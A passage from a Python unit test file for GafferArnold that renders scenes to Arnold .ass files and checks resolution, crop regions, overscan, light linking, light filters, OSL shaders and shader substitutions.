s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["options"]["out"] )
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
# Default camera should have the right resolution.
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
options = arnold.AiUniverseGetOptions( universe )
self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 400 )
self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 200 )
# As should a camera picked from the scene.
s["options"]["options"]["renderCamera"]["enabled"].setValue( True )
s["options"]["options"]["renderCamera"]["value"].setValue( "/camera" )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
options = arnold.AiUniverseGetOptions( universe )
self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 400 )
self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 200 )
def testRenderRegion( self ) :
s = Gaffer.ScriptNode()
s["camera"] = GafferScene.Camera()
s["options"] = GafferScene.StandardOptions()
s["options"]["in"].setInput( s["camera"]["out"] )
s["options"]["options"]["renderCamera"]["enabled"].setValue( True )
s["options"]["options"]["renderCamera"]["value"].setValue( "/camera" )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["options"]["out"] )
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
# Default region
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
options = arnold.AiUniverseGetOptions( universe )
self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 640 )
self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 480 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_x" ), 0 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_x" ), 639 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_y" ), 0 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_y" ), 479 )
# Apply Crop Window
s["options"]["options"]["renderCropWindow"]["enabled"].setValue( True )
s["options"]["options"]["renderCropWindow"]["value"].setValue( imath.Box2f( imath.V2f( 0.25, 0.5 ), imath.V2f( 0.75, 1.0 ) ) )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
options = arnold.AiUniverseGetOptions( universe )
self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 640 )
self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 480 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_x" ), 160 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_x" ), 479 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_y" ), 240 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_y" ), 479 )
# Test Empty Crop Window
s["options"]["options"]["renderCropWindow"]["value"].setValue( imath.Box2f() )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
options = arnold.AiUniverseGetOptions( universe )
self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 640 )
self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 480 )
# Since Arnold doesn't support empty regions, we default to one pixel in the corner
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_x" ), 0 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_x" ), 0 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_y" ), 479 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_y" ), 479 )
# Apply Overscan
s["options"]["options"]["renderCropWindow"]["enabled"].setValue( False )
s["options"]["options"]["overscan"]["enabled"].setValue( True )
s["options"]["options"]["overscan"]["value"].setValue( True )
s["options"]["options"]["overscanTop"]["enabled"].setValue( True )
s["options"]["options"]["overscanTop"]["value"].setValue( 0.1 )
s["options"]["options"]["overscanBottom"]["enabled"].setValue( True )
s["options"]["options"]["overscanBottom"]["value"].setValue( 0.2 )
s["options"]["options"]["overscanLeft"]["enabled"].setValue( True )
s["options"]["options"]["overscanLeft"]["value"].setValue( 0.3 )
s["options"]["options"]["overscanRight"]["enabled"].setValue( True )
s["options"]["options"]["overscanRight"]["value"].setValue( 0.4 )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
options = arnold.AiUniverseGetOptions( universe )
self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 640 )
self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 480 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_x" ), -192 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_x" ), 640 + 255 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_y" ), -48 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_y" ), 480 + 95 )
def testMissingCameraRaises( self ) :
s = Gaffer.ScriptNode()
s["options"] = GafferScene.StandardOptions()
s["options"]["options"]["renderCamera"]["enabled"].setValue( True )
s["options"]["options"]["renderCamera"]["value"].setValue( "/i/dont/exist" )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["options"]["out"] )
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
# The requested camera doesn't exist - this should raise an exception.
six.assertRaisesRegex( self, RuntimeError, "/i/dont/exist", s["render"]["task"].execute )
# And even the existence of a different camera shouldn't change that.
s["camera"] = GafferScene.Camera()
s["options"]["in"].setInput( s["camera"]["out"] )
six.assertRaisesRegex( self, RuntimeError, "/i/dont/exist", s["render"]["task"].execute )
def testManyCameras( self ) :
camera = GafferScene.Camera()
duplicate = GafferScene.Duplicate()
duplicate["in"].setInput( camera["out"] )
duplicate["target"].setValue( "/camera" )
duplicate["copies"].setValue( 1000 )
render = GafferArnold.ArnoldRender()
render["in"].setInput( duplicate["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
def testTwoRenders( self ) :
sphere = GafferScene.Sphere()
duplicate = GafferScene.Duplicate()
duplicate["in"].setInput( sphere["out"] )
duplicate["target"].setValue( "/sphere" )
duplicate["copies"].setValue( 10000 )
render = GafferArnold.ArnoldRender()
render["in"].setInput( duplicate["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.####.ass" )
errors = []
def executeFrame( frame ) :
with Gaffer.Context() as c :
c.setFrame( frame )
try :
render["task"].execute()
except Exception as e :
errors.append( str( e ) )
threads = []
for i in range( 0, 2 ) :
t = threading.Thread( target = executeFrame, args = ( i, ) )
t.start()
threads.append( t )
for t in threads :
t.join()
if [ int( v ) for v in arnold.AiGetVersion()[:3] ] >= [ 7, 0, 0 ] :
with Gaffer.Context() as c :
for i in range( 0, 2 ) :
c.setFrame( i )
self.assertTrue( os.path.exists( c.substitute( render["fileName"].getValue() ) ) )
else :
self.assertEqual( len( errors ), 1 )
self.assertTrue( "Arnold is already in use" in errors[0] )
def testTraceSets( self ) :
sphere = GafferScene.Sphere()
group = GafferScene.Group()
group["in"][0].setInput( sphere["out"] )
group["in"][1].setInput( sphere["out"] )
set1 = GafferScene.Set()
set1["name"].setValue( "render:firstSphere" )
set1["paths"].setValue( IECore.StringVectorData( [ "/group/sphere" ] ) )
set1["in"].setInput( group["out"] )
set2 = GafferScene.Set()
set2["name"].setValue( "render:secondSphere" )
set2["paths"].setValue( IECore.StringVectorData( [ "/group/sphere1" ] ) )
set2["in"].setInput( set1["out"] )
set3 = GafferScene.Set()
set3["name"].setValue( "render:group" )
set3["paths"].setValue( IECore.StringVectorData( [ "/group" ] ) )
set3["in"].setInput( set2["out"] )
set4 = GafferScene.Set()
set4["name"].setValue( "render:bothSpheres" )
set4["paths"].setValue( IECore.StringVectorData( [ "/group/sphere", "/group/sphere1" ] ) )
set4["in"].setInput( set3["out"] )
render = GafferArnold.ArnoldRender()
render["in"].setInput( set4["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
firstSphere = arnold.AiNodeLookUpByName( universe, "/group/sphere" )
secondSphere = arnold.AiNodeLookUpByName( universe, "/group/sphere1" )
self.assertEqual( self.__arrayToSet( arnold.AiNodeGetArray( firstSphere, "trace_sets" ) ), { "firstSphere", "group", "bothSpheres" } )
self.assertEqual( self.__arrayToSet( arnold.AiNodeGetArray( secondSphere, "trace_sets" ) ), { "secondSphere", "group", "bothSpheres" } )
def testSetsNeedContextEntry( self ) :
script = Gaffer.ScriptNode()
script["light"] = GafferArnold.ArnoldLight()
script["light"].loadShader( "point_light" )
script["expression"] = Gaffer.Expression()
script["expression"].setExpression(
"""parent["light"]["name"] = context["lightName"]"""
)
script["render"] = GafferArnold.ArnoldRender()
script["render"]["in"].setInput( script["light"]["out"] )
script["render"]["mode"].setValue( script["render"].Mode.SceneDescriptionMode )
script["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
for i in range( 0, 100 ) :
with Gaffer.Context() as context :
context["lightName"] = "light%d" % i
script["render"]["task"].execute()
def testFrameAndAASeed( self ) :
options = GafferArnold.ArnoldOptions()
render = GafferArnold.ArnoldRender()
render["in"].setInput( options["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
for frame in ( 1, 2, 2.8, 3.2 ) :
for seed in ( None, 3, 4 ) :
with Gaffer.Context() as c :
c.setFrame( frame )
options["options"]["aaSeed"]["enabled"].setValue( seed is not None )
options["options"]["aaSeed"]["value"].setValue( seed or 1 )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
self.assertEqual(
arnold.AiNodeGetInt( arnold.AiUniverseGetOptions( universe ), "AA_seed" ),
seed or round( frame )
)
def testRendererContextVariable( self ) :
sphere = GafferScene.Sphere()
sphere["name"].setValue( "sphere${scene:renderer}" )
render = GafferArnold.ArnoldRender()
render["in"].setInput( sphere["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
self.assertTrue( arnold.AiNodeLookUpByName( universe, "/sphereArnold" ) is not None )
def testAdaptors( self ) :
sphere = GafferScene.Sphere()
def a() :
result = GafferArnold.ArnoldAttributes()
result["attributes"]["matte"]["enabled"].setValue( True )
result["attributes"]["matte"]["value"].setValue( True )
return result
GafferScene.SceneAlgo.registerRenderAdaptor( "Test", a )
sphere = GafferScene.Sphere()
render = GafferArnold.ArnoldRender()
render["in"].setInput( sphere["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
node = arnold.AiNodeLookUpByName( universe, "/sphere" )
self.assertEqual( arnold.AiNodeGetBool( node, "matte" ), True )
def testLightAndShadowLinking( self ) :
sphere1 = GafferScene.Sphere()
sphere2 = GafferScene.Sphere()
attributes = GafferScene.StandardAttributes()
arnoldAttributes = GafferArnold.ArnoldAttributes()
light1 = GafferArnold.ArnoldLight()
light1.loadShader( "point_light" )
light2 = GafferArnold.ArnoldLight()
light2.loadShader( "point_light" )
group = GafferScene.Group()
render = GafferArnold.ArnoldRender()
attributes["in"].setInput( sphere1["out"] )
arnoldAttributes["in"].setInput( attributes["out"] )
group["in"][0].setInput( arnoldAttributes["out"] )
group["in"][1].setInput( light1["out"] )
group["in"][2].setInput( light2["out"] )
group["in"][3].setInput( sphere2["out"] )
render["in"].setInput( group["out"] )
# Illumination
attributes["attributes"]["linkedLights"]["enabled"].setValue( True )
attributes["attributes"]["linkedLights"]["value"].setValue( "/group/light" )
# Shadows
arnoldAttributes["attributes"]["shadowGroup"]["enabled"].setValue( True )
arnoldAttributes["attributes"]["shadowGroup"]["value"].setValue( "/group/light1" )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
# the first sphere had linked lights
sphere = arnold.AiNodeLookUpByName( universe, "/group/sphere" )
# check illumination
self.assertTrue( arnold.AiNodeGetBool( sphere, "use_light_group" ) )
lights = arnold.AiNodeGetArray( sphere, "light_group" )
self.assertEqual( arnold.AiArrayGetNumElements( lights ), 1 )
self.assertEqual(
arnold.AiNodeGetName( arnold.AiArrayGetPtr( lights, 0 ) ),
"light:/group/light"
)
# check shadows
self.assertTrue( arnold.AiNodeGetBool( sphere, "use_shadow_group" ) )
shadows = arnold.AiNodeGetArray( sphere, "shadow_group" )
self.assertEqual( arnold.AiArrayGetNumElements( shadows ), 1 )
self.assertEqual(
arnold.AiNodeGetName( arnold.AiArrayGetPtr( shadows, 0 ) ),
"light:/group/light1"
)
# the second sphere does not have any light linking enabled
sphere1 = arnold.AiNodeLookUpByName( universe, "/group/sphere1" )
# check illumination
self.assertFalse( arnold.AiNodeGetBool( sphere1, "use_light_group" ) )
lights = arnold.AiNodeGetArray( sphere1, "light_group" )
self.assertEqual( arnold.AiArrayGetNumElements( lights ), 0 )
# check shadows
self.assertFalse( arnold.AiNodeGetBool( sphere1, "use_shadow_group" ) )
shadows = arnold.AiNodeGetArray( sphere1, "shadow_group" )
self.assertEqual( arnold.AiArrayGetNumElements( shadows ), 0 )
def testNoLinkedLightsOnLights( self ) :
sphere = GafferScene.Sphere()
meshLightShader = GafferArnold.ArnoldShader()
meshLightShader.loadShader( "flat" )
meshLightFilter = GafferScene.PathFilter()
meshLightFilter["paths"].setValue( IECore.StringVectorData( [ "/sphere" ] ) )
meshLight = GafferArnold.ArnoldMeshLight()
meshLight["in"].setInput( sphere["out"] )
meshLight["filter"].setInput( meshLightFilter["out"] )
meshLight["parameters"]["color"].setInput( meshLightShader["out"] )
light1 = GafferArnold.ArnoldLight()
light1.loadShader( "point_light" )
light2 = GafferArnold.ArnoldLight()
light2.loadShader( "point_light" )
# Trigger light linking by unlinking a light
light2["defaultLight"].setValue( False )
group = GafferScene.Group()
group["in"][0].setInput( meshLight["out"] )
group["in"][1].setInput( light1["out"] )
group["in"][2].setInput( light2["out"] )
render = GafferArnold.ArnoldRender()
render["in"].setInput( group["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
sphere = arnold.AiNodeLookUpByName( universe, "/group/sphere" )
self.assertIsNotNone( sphere )
self.assertEqual( arnold.AiArrayGetNumElements( arnold.AiNodeGetArray( sphere, "light_group" ) ), 0 )
self.assertFalse( arnold.AiNodeGetBool( sphere, "use_light_group" ) )
def testLightFilters( self ) :
s = Gaffer.ScriptNode()
s["lightFilter"] = GafferArnold.ArnoldLightFilter()
s["lightFilter"].loadShader( "light_blocker" )
s["attributes"] = GafferScene.StandardAttributes()
s["attributes"]["in"].setInput( s["lightFilter"]["out"] )
s["attributes"]["attributes"]["filteredLights"]["enabled"].setValue( True )
s["attributes"]["attributes"]["filteredLights"]["value"].setValue( "defaultLights" )
s["light"] = GafferArnold.ArnoldLight()
s["light"].loadShader( "point_light" )
s["gobo"] = GafferArnold.ArnoldShader()
s["gobo"].loadShader( "gobo" )
s["assignment"] = GafferScene.ShaderAssignment()
s["assignment"]["in"].setInput( s["light"]["out"] )
s["assignment"]["shader"].setInput( s["gobo"]["out"] )
s["group"] = GafferScene.Group()
s["group"]["in"][0].setInput( s["attributes"]["out"] )
s["group"]["in"][1].setInput( s["assignment"]["out"] )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["group"]["out"] )
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
light = arnold.AiNodeLookUpByName( universe, "light:/group/light" )
linkedFilters = arnold.AiNodeGetArray( light, "filters" )
numFilters = arnold.AiArrayGetNumElements( linkedFilters.contents )
self.assertEqual( numFilters, 2 )
linkedFilter = arnold.cast(arnold.AiArrayGetPtr(linkedFilters, 0), arnold.POINTER(arnold.AtNode))
linkedGobo = arnold.cast(arnold.AiArrayGetPtr(linkedFilters, 1), arnold.POINTER(arnold.AtNode))
self.assertEqual( arnold.AiNodeGetName( linkedFilter ), "lightFilter:/group/lightFilter" )
self.assertEqual( arnold.AiNodeEntryGetName( arnold.AiNodeGetNodeEntry( linkedFilter ) ), "light_blocker" )
self.assertEqual( arnold.AiNodeEntryGetName( arnold.AiNodeGetNodeEntry( linkedGobo ) ), "gobo" )
@GafferTest.TestRunner.PerformanceTestMethod( repeat = 1 )
def testLightFiltersMany( self ) :
numLights = 10000
numLightFilters = 10000
s = Gaffer.ScriptNode()
s["lightFilter"] = GafferArnold.ArnoldLightFilter()
s["lightFilter"].loadShader( "light_blocker" )
s["lightFilter"]["filteredLights"].setValue( "defaultLights" )
s["planeFilters"] = GafferScene.Plane( "Plane" )
s["planeFilters"]["divisions"].setValue( imath.V2i( 1, numLightFilters / 2 - 1 ) )
s["instancerFilters"] = GafferScene.Instancer( "Instancer" )
s["instancerFilters"]["in"].setInput( s["planeFilters"]["out"] )
s["instancerFilters"]["instances"].setInput( s["lightFilter"]["out"] )
s["instancerFilters"]["parent"].setValue( "/plane" )
s["light"] = GafferArnold.ArnoldLight()
s["light"].loadShader( "point_light" )
s["planeLights"] = GafferScene.Plane( "Plane" )
s["planeLights"]["divisions"].setValue( imath.V2i( 1, numLights / 2 - 1 ) )
s["instancerLights"] = GafferScene.Instancer( "Instancer" )
s["instancerLights"]["in"].setInput( s["planeLights"]["out"] )
s["instancerLights"]["instances"].setInput( s["light"]["out"] )
s["instancerLights"]["parent"].setValue( "/plane" )
s["group"] = GafferScene.Group( "Group" )
s["group"]["in"][0].setInput( s["instancerFilters"]["out"] )
s["group"]["in"][1].setInput( s["instancerLights"]["out"] )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["group"]["out"] )
with Gaffer.Context() as c :
c["scene:render:sceneTranslationOnly"] = IECore.BoolData( True )
s["render"]["task"].execute()
def testAbortRaises( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["plane"]["transform"]["translate"]["z"].setValue( -10 )
s["shader"] = GafferArnold.ArnoldShader()
s["shader"].loadShader( "image" )
# Missing texture should cause render to abort
s["shader"]["parameters"]["filename"].setValue( "iDontExist" )
s["filter"] = GafferScene.PathFilter()
s["filter"]["paths"].setValue( IECore.StringVectorData( [ "/plane" ] ) )
s["shaderAssignment"] = GafferScene.ShaderAssignment()
s["shaderAssignment"]["in"].setInput( s["plane"]["out"] )
s["shaderAssignment"]["filter"].setInput( s["filter"]["out"] )
s["shaderAssignment"]["shader"].setInput( s["shader"]["out"] )
s["outputs"] = GafferScene.Outputs()
s["outputs"].addOutput(
"beauty",
IECoreScene.Output(
self.temporaryDirectory() + "/test.tif",
"tiff",
"rgba",
{}
)
)
s["outputs"]["in"].setInput( s["shaderAssignment"]["out"] )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["outputs"]["out"] )
six.assertRaisesRegex( self, RuntimeError, "Render aborted", s["render"]["task"].execute )
def testOSLShaders( self ) :
purple = GafferOSL.OSLShader()
purple.loadShader( "Maths/MixColor" )
purple["parameters"]["a"].setValue( imath.Color3f( 0.5, 0, 1 ) )
green = GafferOSL.OSLShader()
green.loadShader( "Maths/MixColor" )
green["parameters"]["a"].setValue( imath.Color3f( 0, 1, 0 ) )
mix = GafferOSL.OSLShader()
mix.loadShader( "Maths/MixColor" )
# test component connections
mix["parameters"]["a"][2].setInput( purple["out"]["out"][2] )
# test color connections
mix["parameters"]["b"].setInput( green["out"]["out"] )
mix["parameters"]["m"].setValue( 0.5 )
ball = GafferArnold.ArnoldShaderBall()
ball["shader"].setInput( mix["out"] )
catalogue = GafferImage.Catalogue()
outputs = GafferScene.Outputs()
outputs.addOutput(
"beauty",
IECoreScene.Output(
"test",
"ieDisplay",
"rgba",
{
"driverType" : "ClientDisplayDriver",
"displayHost" : "localhost",
"displayPort" : str( catalogue.displayDriverServer().portNumber() ),
"remoteDisplayType" : "GafferImage::GafferDisplayDriver",
}
)
)
outputs["in"].setInput( ball["out"] )
render = GafferArnold.ArnoldRender()
render["in"].setInput( outputs["out"] )
with GafferTest.ParallelAlgoTest.UIThreadCallHandler() as handler :
render["task"].execute()
handler.waitFor( 0.1 ) #Just need to let the catalogue update
self.assertEqual( self.__color4fAtUV( catalogue, imath.V2f( 0.5 ) ), imath.Color4f( 0, 0.5, 0.5, 1 ) )
def testDefaultLightsMistakesDontForceLinking( self ) :
light = GafferArnold.ArnoldLight()
light.loadShader( "point_light" )
sphere = GafferScene.Sphere()
# It doesn't make sense to add a non-light to the "defaultLights"
# set like this, but in the event of user error, we don't want to
# emit light links unnecessarily.
sphereSet = GafferScene.Set()
sphereSet["in"].setInput( sphere["out"] )
sphereSet["name"].setValue( "defaultLights" )
sphereSet["paths"].setValue( IECore.StringVectorData( [ "/sphere" ] ) )
group = GafferScene.Group()
group["in"][0].setInput( light["out"] )
group["in"][1].setInput( sphereSet["out"] )
render = GafferArnold.ArnoldRender()
render["in"].setInput( group["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
sphere = arnold.AiNodeLookUpByName( universe, "/group/sphere" )
self.assertIsNotNone( sphere )
self.assertEqual( arnold.AiArrayGetNumElements( arnold.AiNodeGetArray( sphere, "light_group" ) ), 0 )
self.assertFalse( arnold.AiNodeGetBool( sphere, "use_light_group" ) )
def testLightLinkingWarnings( self ) :
# Emulate a meshlight that has been set up sloppily - it is filtered to 4 locations, some actually
# have meshes, some don't
lightSphere = GafferScene.Sphere()
lightInvalid = GafferScene.Group()
lightGroup = GafferScene.Group()
lightGroup["name"].setValue( "lightGroup" )
lightGroup["in"][0].setInput( lightSphere["out"] ) # Has a mesh
lightGroup["in"][1].setInput( lightSphere["out"] ) # Has a mesh
lightGroup["in"][2].setInput( lightInvalid["out"] ) # Doesn't have a mesh
lightGroup["in"][3].setInput( lightInvalid["out"] ) # Doesn't have a mesh
meshLightFilter = GafferScene.PathFilter()
meshLightFilter["paths"].setValue( IECore.StringVectorData( [ "/lightGroup/*" ] ) )
meshLight = GafferArnold.ArnoldMeshLight()
meshLight["in"].setInput( lightGroup["out"] )
meshLight["filter"].setInput( meshLightFilter["out"] )
geoSphere = GafferScene.Sphere()
geoGroup = GafferScene.Group()
geoGroup["name"].setValue( "geoGroup" )
for i in range( 20 ):
geoGroup["in"][i].setInput( geoSphere["out"] )
group = GafferScene.Group()
group["in"][0].setInput( geoGroup["out"] )
group["in"][1].setInput( meshLight["out"] )
attributeFilter = GafferScene.PathFilter()
attributeFilter["paths"].setValue( IECore.StringVectorData( [ "/group/geoGroup/*" ] ) )
attributes = GafferScene.StandardAttributes()
attributes["in"].setInput( group["out"] )
attributes["filter"].setInput( attributeFilter["out"] )
attributes["attributes"]["linkedLights"]["enabled"].setValue( True )
# Link some ( but not all ) lights, so we have to do actual light linking
attributes["attributes"]["linkedLights"]["value"].setValue(
"/group/lightGroup/sphere1 /group/lightGroup/group /group/lightGroup/group1"
)
render = GafferArnold.ArnoldRender()
render["in"].setInput( attributes["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
# Don't really understand why a regular `with CapturingMessageHandler` doesn't work here
try :
defaultHandler = IECore.MessageHandler.getDefaultHandler()
mh = IECore.CapturingMessageHandler()
IECore.MessageHandler.setDefaultHandler( mh )
render["task"].execute()
finally :
IECore.MessageHandler.setDefaultHandler( defaultHandler )
# We want to see one message per invalid light - not repeated for each location it's referenced at
self.assertEqual( len( mh.messages ), 2 )
mm = [ m.message for m in mh.messages ]
self.assertTrue( "Mesh light without object at location: /group/lightGroup/group" in mm )
self.assertTrue( "Mesh light without object at location: /group/lightGroup/group1" in mm )
def __color4fAtUV( self, image, uv ) :
sampler = GafferImage.ImageSampler()
sampler["image"].setInput( image["out"] )
dw = image['out']["format"].getValue().getDisplayWindow().size()
sampler["pixel"].setValue( uv * imath.V2f( dw.x, dw.y ) )
return sampler["color"].getValue()
def __arrayToSet( self, a ) :
result = set()
for i in range( 0, arnold.AiArrayGetNumElements( a.contents ) ) :
if arnold.AiArrayGetType( a.contents ) == arnold.AI_TYPE_STRING :
result.add( arnold.AiArrayGetStr( a, i ) )
else :
raise TypeError
return result
def testPerformanceMonitorDoesntCrash( self ) :
options = GafferScene.StandardOptions()
options["options"]["performanceMonitor"]["value"].setValue( True )
options["options"]["performanceMonitor"]["enabled"].setValue( True )
render = GafferArnold.ArnoldRender()
render["in"].setInput( options["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
def testShaderSubstitutions( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["planeAttrs"] = GafferScene.CustomAttributes()
s["planeAttrs"]["in"].setInput( s["plane"]["out"] )
s["planeAttrs"]["attributes"].addChild( Gaffer.NameValuePlug( "A", Gaffer.StringPlug( "value", defaultValue = 'bar' ) ) )
s["planeAttrs"]["attributes"].addChild( Gaffer.NameValuePlug( "B", Gaffer.StringPlug( "value", defaultValue = 'foo' ) ) )
s["cube"] = GafferScene.Cube()
s["cubeAttrs"] = GafferScene.CustomAttributes()
s["cubeAttrs"]["in"].setInput( s["cube"]["out"] )
s["cubeAttrs"]["attributes"].addChild( Gaffer.NameValuePlug( "B", Gaffer.StringPlug( "value", defaultValue = 'override' ) ) )
s["parent"] = GafferScene.Parent()
s["parent"]["in"].setInput( s["planeAttrs"]["out"] )
s["parent"]["children"][0].setInput( s["cubeAttrs"]["out"] )
s["parent"]["parent"].setValue( "/plane" )
s["shader"] = GafferArnold.ArnoldShader()
s["shader"].loadShader( "image" )
s["shader"]["parameters"]["filename"].setValue( "<attr:A>/path/<attr:B>.tx" )
s["filter"] = GafferScene.PathFilter()
s["filter"]["paths"].setValue( IECore.StringVectorData( [ "/plane" ] ) )
s["shaderAssignment"] = GafferScene.ShaderAssignment()
s["shaderAssignment"]["in"].setInput( s["parent"]["out"] )
s["shaderAssignment"]["filter"].setInput( s["filter"]["out"] )
s["shaderAssignment"]["shader"].setInput( s["shader"]["out"] )
s["light"] = GafferArnold.ArnoldLight()
s["light"].loadShader( "photometric_light" )
s["light"]["parameters"]["filename"].setValue( "/path/<attr:A>.ies" )
s["goboTexture"] = GafferArnold.ArnoldShader()
s["goboTexture"].loadShader( "image" )
s["goboTexture"]["parameters"]["filename"].setValue( "<attr:B>/gobo.tx" )
s["gobo"] = GafferArnold.ArnoldShader()
s["gobo"].loadShader( "gobo" )
s["gobo"]["parameters"]["slidemap"].setInput( s["goboTexture"]["out"] )
s["goboAssign"] = GafferScene.ShaderAssignment()
s["goboAssign"]["in"].setInput( s["light"]["out"] )
s["goboAssign"]["shader"].setInput( s["gobo"]["out"] )
s["lightBlocker"] = GafferArnold.ArnoldLightFilter()
s["lightBlocker"].loadShader( "light_blocker" )
s["lightBlocker"]["parameters"]["geometry_type"].setValue( "<attr:geometryType>" )
s["lightGroup"] = GafferScene.Group()
s["lightGroup"]["name"].setValue( "lightGroup" )
s["lightGroup"]["in"][0].setInput( s["goboAssign"]["out"] )
s["lightGroup"]["in"][1].setInput( s["lightBlocker"]["out"] )
s["parent2"] = GafferScene.Parent()
s["parent2"]["in"].setInput( s["shaderAssignment"]["out"] )
s["parent2"]["children"][0].setInput( s["lightGroup"]["out"] )
s["parent2"]["parent"].setValue( "/" )
s["globalAttrs"] = GafferScene.CustomAttributes()
s["globalAttrs"]["in"].setInput( s["parent2"]["out"] )
s["globalAttrs"]["global"].setValue( True )
s["globalAttrs"]["attributes"].addChild( Gaffer.NameValuePlug( "A", Gaffer.StringPlug( "value", defaultValue = 'default1' ) ) )
s["globalAttrs"]["attributes"].addChild( Gaffer.NameValuePlug( "B", Gaffer.StringPlug( "value", defaultValue = 'default2' ) ) )
s["globalAttrs"]["attributes"].addChild( Gaffer.NameValuePlug( "geometryType", Gaffer.StringPlug( "value", defaultValue = 'cylinder' ) ) )
